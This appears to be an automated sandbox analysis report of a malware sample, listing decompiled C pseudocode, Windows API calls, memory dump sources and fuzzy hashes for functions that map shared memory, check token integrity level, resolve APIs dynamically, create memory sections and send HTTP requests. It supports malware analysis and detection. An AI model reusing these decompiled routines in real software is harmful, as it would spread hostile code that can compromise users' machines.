            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($mn@$oQZ$kiu
            • API String ID: 544645111-1792616812
            • Opcode ID: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
            • Instruction ID: 72e014972078c534ab087c231bb10598d054eb390f010d6b2350a8619cf21a67
            • Opcode Fuzzy Hash: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
            • Instruction Fuzzy Hash: C6B1FBB56093809FC254CF6AD18960AFBF0FB94744F94990CB9A59B620D3B4C985CF4B
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E047E415A(intOrPtr __edx, void** _a4, void** _a8) {
            				intOrPtr _v8;
            				struct _FILETIME* _v12;
            				short _v56;
            				struct _FILETIME* _t12;
            				intOrPtr _t13;
            				void* _t17;
            				void* _t21;
            				intOrPtr _t27;
            				long _t28;
            				void* _t30;
            
            				_t27 = __edx;
            				_t12 =  &_v12;
            				GetSystemTimeAsFileTime(_t12);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v8);
            				_push(_v12);
            				L047E82D4();
            				_push(_t12);
            				_v12 = _t12;
            				_t13 =  *0x47ea348; // 0xc3d5a8
            				_t5 = _t13 + 0x47eb7b4; // 0x5428d5c
            				_t6 = _t13 + 0x47eb644; // 0x530025
            				_push(0x16);
            				_push( &_v56);
            				_v8 = _t27;
            				L047E7F3A();
            				_t17 = CreateFileMappingW(0xffffffff, 0x47ea34c, 4, 0, 0x1000,  &_v56); // executed
            				_t30 = _t17;
            				if(_t30 == 0) {
            					_t28 = GetLastError();
            				} else {
            					if(GetLastError() == 0xb7) {
            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            						if(_t21 == 0) {
            							_t28 = GetLastError();
            							if(_t28 != 0) {
            								goto L6;
            							}
            						} else {
            							 *_a4 = _t30;
            							 *_a8 = _t21;
            							_t28 = 0;
            						}
            					} else {
            						_t28 = 2;
            						L6:
            						CloseHandle(_t30);
            					}
            				}
            				return _t28;
            			}













            0x047e415a
            0x047e4162
            0x047e4166
            0x047e416c
            0x047e4171
            0x047e4176
            0x047e4179
            0x047e417c
            0x047e4181
            0x047e4182
            0x047e4185
            0x047e418a
            0x047e4191
            0x047e419b
            0x047e419d
            0x047e419e
            0x047e41a1
            0x047e41bd
            0x047e41c3
            0x047e41c7
            0x047e4215
            0x047e41c9
            0x047e41d6
            0x047e41e6
            0x047e41ee
            0x047e4200
            0x047e4204
            0x00000000
            0x00000000
            0x047e41f0
            0x047e41f3
            0x047e41f8
            0x047e41fa
            0x047e41fa
            0x047e41d8
            0x047e41da
            0x047e4206
            0x047e4207
            0x047e4207
            0x047e41d6
            0x047e421c

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?,?), ref: 047E4166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047E417C
            • _snwprintf.NTDLL ref: 047E41A1
            • CreateFileMappingW.KERNELBASE(000000FF,047EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 047E41BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E41CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 047E41E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53), ref: 047E4207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E420F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID: @MetNet
            • API String ID: 1814172918-2109406137
            • Opcode ID: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
            • Instruction ID: 5103fd7b6b5ab0f2ccf0a40c747d932e76e30136e016dd97ba84d0476d6123d0
            • Opcode Fuzzy Hash: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
            • Instruction Fuzzy Hash: E12193F2640214BBDB21EB6ACD05FEE37B9EB8C754F114221F605EB391D674A9058B50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 93%
            			E047E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
            				void* _t17;
            				void* _t18;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            				intOrPtr _t24;
            				void* _t37;
            				void* _t41;
            				intOrPtr* _t45;
            
            				_t41 = __edi;
            				_t37 = __ebx;
            				_t45 = __eax;
            				_t16 =  *((intOrPtr*)(__eax + 0x20));
            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
            					E047E16B2(_t16, __ecx, 0xea60);
            				}
            				_t17 =  *(_t45 + 0x18);
            				_push(_t37);
            				_push(_t41);
            				if(_t17 != 0) {
            					InternetSetStatusCallback(_t17, 0);
            					InternetCloseHandle( *(_t45 + 0x18)); // executed
            				}
            				_t18 =  *(_t45 + 0x14);
            				if(_t18 != 0) {
            					InternetSetStatusCallback(_t18, 0);
            					InternetCloseHandle( *(_t45 + 0x14));
            				}
            				_t19 =  *(_t45 + 0x10);
            				if(_t19 != 0) {
            					InternetSetStatusCallback(_t19, 0);
            					InternetCloseHandle( *(_t45 + 0x10));
            				}
            				_t20 =  *(_t45 + 0x1c);
            				if(_t20 != 0) {
            					CloseHandle(_t20);
            				}
            				_t21 =  *(_t45 + 0x20);
            				if(_t21 != 0) {
            					CloseHandle(_t21);
            				}
            				_t22 =  *((intOrPtr*)(_t45 + 8));
            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
            					E047E61DA(_t22);
            					 *((intOrPtr*)(_t45 + 8)) = 0;
            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
            				}
            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
            					E047E61DA(_t23);
            				}
            				_t24 =  *_t45;
            				if(_t24 != 0) {
            					_t24 = E047E61DA(_t24);
            				}
            				_t46 =  *((intOrPtr*)(_t45 + 4));
            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
            					return E047E61DA(_t46);
            				}
            				return _t24;
            			}












            0x047e4be7
            0x047e4be7
            0x047e4be9
            0x047e4beb
            0x047e4bf2
            0x047e4bf9
            0x047e4bf9
            0x047e4bfe
            0x047e4c01
            0x047e4c08
            0x047e4c11
            0x047e4c15
            0x047e4c1a
            0x047e4c1a
            0x047e4c1c
            0x047e4c21
            0x047e4c25
            0x047e4c2a
            0x047e4c2a
            0x047e4c2c
            0x047e4c31
            0x047e4c35
            0x047e4c3a
            0x047e4c3a
            0x047e4c3c
            0x047e4c47
            0x047e4c4a
            0x047e4c4a
            0x047e4c4c
            0x047e4c51
            0x047e4c54
            0x047e4c54
            0x047e4c56
            0x047e4c5d
            0x047e4c60
            0x047e4c65
            0x047e4c68
            0x047e4c68
            0x047e4c6b
            0x047e4c70
            0x047e4c73
            0x047e4c73
            0x047e4c78
            0x047e4c7c
            0x047e4c7f
            0x047e4c7f
            0x047e4c84
            0x047e4c89
            0x00000000
            0x047e4c8c
            0x047e4c93

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C15
            • InternetCloseHandle.WININET(?), ref: 047E4C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C25
            • InternetCloseHandle.WININET(?), ref: 047E4C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C35
            • InternetCloseHandle.WININET(?), ref: 047E4C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C54
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
            • Instruction ID: e99ffac1e5312078c1b682185444f61799486066c413dfbbd76752e274aad0b3
            • Opcode Fuzzy Hash: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
            • Instruction Fuzzy Hash: 63113D766006586BC530AEABED84C6BB7FDEB4C2053954F18E185D3721C735F8498A60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E047E5E40(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
            				_v16 = 1;
            				_v20 = 0x2000;
            				if( *0x47ea2fc > 5) {
            					_v16 = 0;
            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
            						_v8 = 0;
            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
            						if(_v8 != 0) {
            							_t46 = E047E33DC(_v8);
            							if(_t46 != 0) {
            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
            								if(_t33 != 0) {
            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
            								}
            								E047E61DA(_t46);
            							}
            						}
            						CloseHandle(_v12);
            					}
            				}
            				 *_a4 = _v20;
            				return _v16;
            			}









            0x047e5e4d
            0x047e5e54
            0x047e5e5b
            0x047e5e6f
            0x047e5e7a
            0x047e5e92
            0x047e5e9f
            0x047e5ea2
            0x047e5ea7
            0x047e5eb2
            0x047e5eb6
            0x047e5ec5
            0x047e5ec9
            0x047e5ee5
            0x047e5ee5
            0x047e5ee9
            0x047e5ee9
            0x047e5eee
            0x047e5ef2
            0x047e5ef8
            0x047e5ef9
            0x047e5f00
            0x047e5f06

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047E5E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047E5E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047E5EA2
            • CloseHandle.KERNEL32(00000000), ref: 047E5EF2
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047E5EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047E5ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047E5EDD
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
            • Instruction ID: e59fff6adece1b6cde69a14ee546e0b74cd1c31c03491ea25d405247f83c0b53
            • Opcode Fuzzy Hash: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
            • Instruction Fuzzy Hash: C221597590020DFFEB00DFA2CC84EFEBBB9EB48304F0041A5EA10AA251DB759E54DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 64%
            			E047E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				intOrPtr _v8;
            				intOrPtr _t9;
            				intOrPtr _t13;
            				char* _t19;
            				char* _t28;
            				void* _t33;
            				void* _t34;
            				char* _t36;
            				void* _t38;
            				intOrPtr* _t39;
            				char* _t40;
            				char* _t42;
            				char* _t43;
            
            				_t34 = __edx;
            				_push(__ecx);
            				_t9 =  *0x47ea348; // 0xc3d5a8
            				_t1 = _t9 + 0x47eb516; // 0x253d7325
            				_t36 = 0;
            				_t28 = E047E5815(__ecx, _t1);
            				if(_t28 != 0) {
            					_t39 = __imp__;
            					_t13 =  *_t39(_t28, _t38);
            					_v8 = _t13;
            					_t6 =  *_t39(_a4) + 1; // 0x5429601
            					_t40 = E047E33DC(_v8 + _t6);
            					if(_t40 != 0) {
            						strcpy(_t40, _t28);
            						_pop(_t33);
            						__imp__(_t40, _a4);
            						_t19 = E047E5063(_t33, _t34, _t40, _a8); // executed
            						_t36 = _t19;
            						E047E61DA(_t40);
            						_t42 = E047E4AC7(StrTrimA(_t36, "="), _t36);
            						if(_t42 != 0) {
            							E047E61DA(_t36);
            							_t36 = _t42;
            						}
            						_t43 = E047E2708(_t36, _t33);
            						if(_t43 != 0) {
            							E047E61DA(_t36);
            							_t36 = _t43;
            						}
            					}
            					E047E61DA(_t28);
            				}
            				return _t36;
            			}
















            0x047e6675
            0x047e6678
            0x047e6679
            0x047e6680
            0x047e6687
            0x047e668e
            0x047e6692
            0x047e6699
            0x047e66a0
            0x047e66a5
            0x047e66ad
            0x047e66b7
            0x047e66bb
            0x047e66bf
            0x047e66c5
            0x047e66ca
            0x047e66d4
            0x047e66da
            0x047e66dc
            0x047e66f3
            0x047e66f7
            0x047e66fa
            0x047e66ff
            0x047e66ff
            0x047e6708
            0x047e670c
            0x047e670f
            0x047e6714
            0x047e6714
            0x047e670c
            0x047e6717
            0x047e671c
            0x047e6722

            APIs
              • Part of subcall function 047E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E668E,253D7325,00000000,00000000,?,76B5C740,047E3ECE), ref: 047E587C
              • Part of subcall function 047E5815: sprintf.NTDLL ref: 047E589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
            • lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • strcpy.NTDLL ref: 047E66BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E5063: lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
              • Part of subcall function 047E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,047E66F3,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E4AD1
              • Part of subcall function 047E4AC7: _snprintf.NTDLL ref: 047E4B2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
            • Instruction ID: 40384eef5541a5d43349ddac50447f29ccbf796c618402297544cc557e7f7b93
            • Opcode Fuzzy Hash: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
            • Instruction Fuzzy Hash: 6411A373901129779612BBBADC88CBE37AD9E5D6683454316FA04AB302DE79FD0247A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 353 401202-401214 call 4012e6 356 4012d5 353->356 357 40121a-40124f GetModuleHandleA GetProcAddress 353->357 358 4012dc-4012e3 356->358 359 401251-401265 GetProcAddress 357->359 360 4012cd-4012d3 call 401ba9 357->360 359->360 362 401267-40127b GetProcAddress 359->362 360->358 362->360 364 40127d-401291 GetProcAddress 362->364 364->360 365 401293-4012a7 GetProcAddress 364->365 365->360 366 4012a9-4012ba call 40110b 365->366 368 4012bf-4012c4 366->368 368->360 369 4012c6-4012cb 368->369 369->358
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);
            				if(_t56 == 0) {
            					_v8 = 8;
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
            											 *_a16 = _t56;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}












            0x00401210
            0x00401214
            0x004012d5
            0x0040121a
            0x00401232
            0x00401241
            0x00401248
            0x0040124a
            0x0040124f
            0x004012cd
            0x004012ce
            0x00401251
            0x0040125e
            0x00401260
            0x00401265
            0x00000000
            0x00401267
            0x00401274
            0x00401276
            0x0040127b
            0x00000000
            0x0040127d
            0x0040128a
            0x0040128c
            0x00401291
            0x00000000
            0x00401293
            0x004012a0
            0x004012a2
            0x004012a7
            0x00000000
            0x004012a9
            0x004012af
            0x004012b5
            0x004012ba
            0x004012bf
            0x004012c4
            0x00000000
            0x004012c6
            0x004012c9
            0x004012c9
            0x004012c4
            0x004012a7
            0x00401291
            0x0040127b
            0x00401265
            0x0040124f
            0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				void* __esi;
            				long _t10;
            				void* _t18;
            				void* _t22;
            
            				_t9 = __eax;
            				_t22 = __eax;
            				if(_a4 != 0 && E047E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
            					L9:
            					return GetLastError();
            				}
            				_t10 = E047E7B83(_t9, _t18, _t22, _a8); // executed
            				if(_t10 == 0) {
            					ResetEvent( *(_t22 + 0x1c));
            					ResetEvent( *(_t22 + 0x20));
            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
            						SetEvent( *(_t22 + 0x1c));
            						goto L7;
            					} else {
            						_t10 = GetLastError();
            						if(_t10 == 0x3e5) {
            							L7:
            							_t10 = 0;
            						}
            					}
            				}
            				if(_t10 == 0xffffffff) {
            					goto L9;
            				}
            				return _t10;
            			}







            0x047e51d8
            0x047e51e5
            0x047e51e7
            0x047e524a
            0x00000000
            0x047e524a
            0x047e51ff
            0x047e5206
            0x047e5212
            0x047e5217
            0x047e522d
            0x047e523d
            0x00000000
            0x047e522f
            0x047e522f
            0x047e5236
            0x047e5243
            0x047e5243
            0x047e5243
            0x047e5236
            0x047e522d
            0x047e5248
            0x00000000
            0x00000000
            0x047e524e

            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E5212
            • ResetEvent.KERNEL32(?), ref: 047E5217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 047E5224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?,?), ref: 047E522F
            • GetLastError.KERNEL32(?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E524A
              • Part of subcall function 047E2058: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064
              • Part of subcall function 047E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
              • Part of subcall function 047E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E523D
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
            • Instruction ID: 7468267b4ba301ac5d8ae5c36ef7c18b4ea40c07b388d46c1ec2b7c5e4d07d3e
            • Opcode Fuzzy Hash: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
            • Instruction Fuzzy Hash: 41014BB1100205BAEB306AB7ED48F6B77A9EF4C368F104B29E691952E1D721F814DA20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E047E5364(void** __esi) {
            				intOrPtr _v0;
            				intOrPtr _t4;
            				intOrPtr _t6;
            				void* _t8;
            				void* _t9;
            				intOrPtr _t10;
            				void* _t11;
            				void** _t13;
            
            				_t13 = __esi;
            				_t4 =  *0x47ea3cc; // 0x5429600
            				__imp__(_t4 + 0x40);
            				while(1) {
            					_t6 =  *0x47ea3cc; // 0x5429600
            					_t1 = _t6 + 0x58; // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t8 =  *_t13;
            				if(_t8 != 0 && _t8 != 0x47ea030) {
            					HeapFree( *0x47ea2d8, 0, _t8);
            				}
            				_t9 = E047E12C6(_v0, _t13); // executed
            				_t13[1] = _t9;
            				_t10 =  *0x47ea3cc; // 0x5429600
            				_t11 = _t10 + 0x40;
            				__imp__(_t11);
            				return _t11;
            			}











            0x047e5364
            0x047e5364
            0x047e536d
            0x047e537d
            0x047e537d
            0x047e5382
            0x047e5387
            0x00000000
            0x00000000
            0x047e5377
            0x047e5377
            0x047e5389
            0x047e538d
            0x047e539f
            0x047e539f
            0x047e53aa
            0x047e53af
            0x047e53b2
            0x047e53b7
            0x047e53bb
            0x047e53c1

            APIs
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E536D
            • Sleep.KERNEL32(0000000A), ref: 047E5377
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E539F
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E53BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
